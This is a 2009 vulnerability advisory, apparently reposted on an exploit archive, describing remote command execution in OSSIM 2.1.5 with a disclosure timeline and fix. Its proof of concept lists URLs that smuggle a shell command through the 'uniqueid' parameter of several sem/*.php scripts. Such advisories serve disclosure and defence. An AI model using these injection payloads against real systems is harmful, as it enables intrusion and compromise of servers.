OSSIM v2.1.5 Remote Command Execution

=====================================
OSSIM v2.1.5 Remote Command Execution
=====================================

Advisory Name: Remote Command Execution in OSSIM
 
 
Vulnerability Class: Remote Command Execution
 
Release Date: 12-16-2009
 
Affected Applications: Confirmed in OSSIM 2.1.5. Other versions may also be affected.
 
Affected Platforms: Multiple
 
Local / Remote: Remote
 
Severity: High – CVSS: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
 
Researcher: Nahuel Grisol?a
 
Vendor Status: Acknowledged/Fixed. New release available (OSSIM 2.1.5-4)
 
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
 
Vulnerability Description:
 
OSSIM is prone to a remote command execution vulnerability because the software fails to adequately
sanitize user-supplied input.
Successful attacks can compromise the affected software and possibly the computer running OSSIM.
 
Proof of Concept:
 
http://server/ossim/sem/wcl.php?uniqueid=1;ls%20%3E%20/tmp/listing
http://server/ossim/sem/storage_graphs.php?uniqueid=;ls%20%3E%20/tmp/listing;
http://server/ossim/sem/storage_graphs2.php?uniqueid=;ls%20%3E%20/tmp/listing;
http://server/ossim/sem/storage_graphs3.php?uniqueid=;ls%20%3E%20/tmp/listing;
http://server/ossim/sem/storage_graphs4.php?uniqueid=;ls%20%3E%20/tmp/listing;
 
Impact:
 
Direct execution of arbitrary code in the context of Webserver user.
Solution: Upgrade to OSSIM 2.1.5-4
 
Vendor Response:
 
2009-12-08 – Vulnerability is identified
2009-12-09 – Vendor is contacted
2009-12-09 – Vendor confirmed vulnerability
2009-12-16 – Vendor released fixed version
2009-12-16 – Vulnerability is published



#  0day.today [2018-03-02]  #